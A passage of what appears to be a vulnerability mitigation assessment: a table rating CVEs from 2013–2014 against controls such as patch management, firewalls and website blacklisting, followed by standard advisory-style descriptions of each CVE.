| CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install) |
| CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration |
| CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall |
| CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware |
| CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (no JS) |
| CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration |
| CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration |
| CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration |
| CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration |
| CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration |
| CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall |
| CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion) |
| CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management |
| CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration |
| CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management |
| CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management |
| CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management |
| CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS |
| CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL |
| CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL |
| CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management |
| CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware |
| CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management |
| CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting) |
| CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management |
| CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware |
| CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing) |
| CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control |
| CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management |
| CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management |
| CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management |
| CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management |
| CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management |
| CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management |
| CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management |
| CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall |
| CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS |
| CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting |
| CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access) |
| CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS |
| CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management |
| CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall Anti DOS, Patch Management |
| CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-DoS, Firmware Updates |
| CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management |
| CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware |
| CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y | | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management |
| CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management |
| CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall Anti-DoS, Firmware Updates |
| CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration |
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."
CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."
CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."
CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.
CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.
CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.
CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.
CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.
CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.
CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.
CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.
CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.
CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.
CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.
CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.
CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.
CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.
CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.
CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.
CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.
CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.
CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.
CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.
CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.
CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.
CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.
CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
